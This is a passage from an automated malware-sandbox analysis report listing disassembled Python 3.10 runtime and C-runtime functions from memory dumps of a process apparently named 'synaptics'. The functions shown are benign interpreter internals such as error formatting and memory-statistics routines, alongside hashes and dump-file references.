                                                                                                                                                                                                        • Part of subcall function 6C48D160: PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyListObject,00000014), ref: 6C48D1BC
                                                                                                                                                                                                      • _PyTuple_DebugMallocStats.PYTHON310(?,?,?,?,?), ref: 6C4A5C50
                                                                                                                                                                                                        • Part of subcall function 6C4B3400: PyOS_snprintf.PYTHON310(?,00000080,free %d-sized PyTupleObject,00000001,?,?), ref: 6C4B3452
                                                                                                                                                                                                        • Part of subcall function 6C4B3400: PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,?,00000009,?,00000080,free %d-sized PyTupleObject,00000001,?,?), ref: 6C4B348A
                                                                                                                                                                                                        • Part of subcall function 6C4B3400: PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,?,00000009,?,00000080,free %d-sized PyTupleObject,00000001,?,?), ref: 6C4B34A7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: S_snprintf$DebugMallocStats$Dict_Float_Frame_List_Tuple_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3211691983-0
                                                                                                                                                                                                      • Opcode ID: 20d6930bc868dd16d614ca4f1ed270ac0ca5d382c997bcf70737857c33995726
                                                                                                                                                                                                      • Instruction ID: 656b91403092e6bfc88e36dc01eec29f26399a5fcca7c04954e79c659a4838ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20d6930bc868dd16d614ca4f1ed270ac0ca5d382c997bcf70737857c33995726
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84D0C966507838328502B6696C40ECF760C4E0245C7450059F90933B02AB59B60A42FE
                                                                                                                                                                                                      Function 6C492EE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,00000506), ref: 6C492F1F
                                                                                                                                                                                                      • _PyNumber_Index.PYTHON310(?), ref: 6C492F40
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\longobject.c, xrefs: 6C492F0E
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C492F13
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatIndexNumber_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\longobject.c
                                                                                                                                                                                                      • API String ID: 2020841858-3761076943
                                                                                                                                                                                                      • Opcode ID: 2344d6848083d85af08e31b9328b0cc50f503fc86822a9db34822617448fde48
                                                                                                                                                                                                      • Instruction ID: 183d9eba62b36119509a76350b4cdf0a540e8167fed8ff9a91545e563401cfc1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2344d6848083d85af08e31b9328b0cc50f503fc86822a9db34822617448fde48
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A51D571A087158BC300CE29C880F1ABBF5BBC6329F10872DF8AC87B94E775D9458782
                                                                                                                                                                                                      Function 6C494830 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Negative size passed to PyUnicode_FromStringAndSize, xrefs: 6C494B6F
                                                                                                                                                                                                      • invalid literal for int() with base %d: %.200R, xrefs: 6C494DF2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: Negative size passed to PyUnicode_FromStringAndSize$invalid literal for int() with base %d: %.200R
                                                                                                                                                                                                      • API String ID: 0-3640956596
                                                                                                                                                                                                      • Opcode ID: dc03cd98858f83e8fa63cfa28b385c6507c3dbaf98d33f01eb47e19e82b99f6a
                                                                                                                                                                                                      • Instruction ID: be8cdcaf7284115f74a8837d4884cb0c00c0d80173d9d115ef0f351e34de4997
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc03cd98858f83e8fa63cfa28b385c6507c3dbaf98d33f01eb47e19e82b99f6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3515970A092218BDB01CF29C450F57BFE4AF863A9F14472DE9B8A7B51E731C846CB81
                                                                                                                                                                                                      Function 6C4C8830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyBytesWriter_Prepare.PYTHON310(?,?,00000000,?,-00000003,00000001,?,?,00000001,?,?,?,?,?,?,?), ref: 6C4C890F
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,encoded result is too long for a Python string,?,-00000003,00000001,?,?,00000001,?,?,?,?,?,?,?), ref: 6C4C894D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • encoded result is too long for a Python string, xrefs: 6C4C8946
                                                                                                                                                                                                      • &#%d;, xrefs: 6C4C8970
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BytesErr_PrepareStringWriter_
                                                                                                                                                                                                      • String ID: &#%d;$encoded result is too long for a Python string
                                                                                                                                                                                                      • API String ID: 2221463695-4015250813
                                                                                                                                                                                                      • Opcode ID: a098d4e19e2d056fc208ac45ec2ec98d6c781169167d4e64f67aec70f2290b0f
                                                                                                                                                                                                      • Instruction ID: f2deead0df6a48bdb8f6ca2a2751f18003187ba4a47b887de9bdec2254e4e54d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a098d4e19e2d056fc208ac45ec2ec98d6c781169167d4e64f67aec70f2290b0f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC4129397482159BD704CA0DCC81EAAB3A1EB81319F444A3BE995D7FA0D638DC4647B3
                                                                                                                                                                                                      Function 6C4E6CF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4E6F83
                                                                                                                                                                                                      • D:\a\1\s\Objects\unicodeobject.c, xrefs: 6C4E6F7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\unicodeobject.c
                                                                                                                                                                                                      • API String ID: 0-1534905068
                                                                                                                                                                                                      • Opcode ID: fd48c8a5f22b258a9cf2e9cabc7d55117c86444de95d4912a78f01bfa644c8c7
                                                                                                                                                                                                      • Instruction ID: ee7362ecfb11a84e2436e89d3b6219704a68b42a7870fcfd785baa6405dc0391
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd48c8a5f22b258a9cf2e9cabc7d55117c86444de95d4912a78f01bfa644c8c7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3041B1717007095BDB14CE29C841FAA77A5AF8972BF164A2CEA65CBBD0D730E844C791
                                                                                                                                                                                                      Function 73A86179 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,73A86103,?,?,00000000,00000000,00000000,?), ref: 73A8619E
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,?,?,?,?,73A86103,?,?,00000000,00000000,00000000,?,?), ref: 73A862A9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EncodePointerabort
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 1188231555-2084237596
                                                                                                                                                                                                      • Opcode ID: ffe0d67b7a1c24544f5dea8e7888a378ad347136b7d762a7471aec0d481e61b3
                                                                                                                                                                                                      • Instruction ID: 287fa12e7a46ef5fc971ddc24e146c826dc482b4a3686d7ff2bc8d2afce7ba01
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffe0d67b7a1c24544f5dea8e7888a378ad347136b7d762a7471aec0d481e61b3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF413B71900209AFEF06DF94CD82BED7BB5FF48304F18419AEA0A67265E339DA51DB50
                                                                                                                                                                                                      Function 6C491EA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,00000182,00000000), ref: 6C491ED9
                                                                                                                                                                                                      • _PyNumber_Index.PYTHON310(?), ref: 6C491EF6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\longobject.c, xrefs: 6C491EC8
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C491ECD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatIndexNumber_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\longobject.c
                                                                                                                                                                                                      • API String ID: 2020841858-3761076943
                                                                                                                                                                                                      • Opcode ID: f6b7fa2e6544a62147abaae2a0c4be2bc721029bdb5be1fd455156ac7bb09c12
                                                                                                                                                                                                      • Instruction ID: 7597e38218280e4b89fe6cb7891b13a67499d537a95bb36b57ac87cd4855bc5e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6b7fa2e6544a62147abaae2a0c4be2bc721029bdb5be1fd455156ac7bb09c12
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C031E831B056299FDB04CE68C880F997BF99B45329F108369F9278BB94E735D941C780
                                                                                                                                                                                                      Function 6C5B9810 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_CallFunction.PYTHON310(?,(O),00000000,?,?,6C5BAD5E), ref: 6C5B990F
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(input too long,00000001,-000000FF,00000000,?,?,6C5BAD5E), ref: 6C5B993E
                                                                                                                                                                                                        • Part of subcall function 6C565850: _PyErr_SetString.PYTHON310(?,`^El,?,?,6C455E60,Negative size passed to PyByteArray_FromStringAndSize), ref: 6C565862
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String$CallFunctionObject_
                                                                                                                                                                                                      • String ID: (O)$input too long
                                                                                                                                                                                                      • API String ID: 3747464196-160667668
                                                                                                                                                                                                      • Opcode ID: 37eee9b815f526dcb6db40e2910ffd433b62ca08f24ee3035ffe3cbd04fff132
                                                                                                                                                                                                      • Instruction ID: 769d270d7ccfd8ca04ff23216f53b6c1c854321d1f7a48bdda4c602d2b50f3e8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37eee9b815f526dcb6db40e2910ffd433b62ca08f24ee3035ffe3cbd04fff132
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A831B1B27002008BDB04DF18DCA1B95B7F1EB55328F158279E86DDBB91D735A805CB91
                                                                                                                                                                                                      Function 6C4D5E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_FSPath.PYTHON310(?), ref: 6C4D5E7A
                                                                                                                                                                                                      • PyUnicode_EncodeFSDefault.PYTHON310(00000000), ref: 6C4D5E9D
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000), ref: 6C4D5EF8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DefaultEncodeErr_ObjectPathUnicode_
                                                                                                                                                                                                      • String ID: embedded null byte
                                                                                                                                                                                                      • API String ID: 2677695783-2965883622
                                                                                                                                                                                                      • Opcode ID: 4eea6da7c530da222fc1d962322a87a0170590bbc246774c6aee48957609749f
                                                                                                                                                                                                      • Instruction ID: c5ff60ec5fc95cfd38f22d0d6934ab9151c86c7ced56b4249c87810f43cdfde2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4eea6da7c530da222fc1d962322a87a0170590bbc246774c6aee48957609749f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F31E4B26052019BD704EFA9E850F9673A4EF4533AF15436CE8688B791DA71FC02C7D1
                                                                                                                                                                                                      Function 6C45EE00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,byte string is too long), ref: 6C45EE3C
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000010,?,?), ref: 6C45EEBD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • byte string is too long, xrefs: 6C45EE35
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
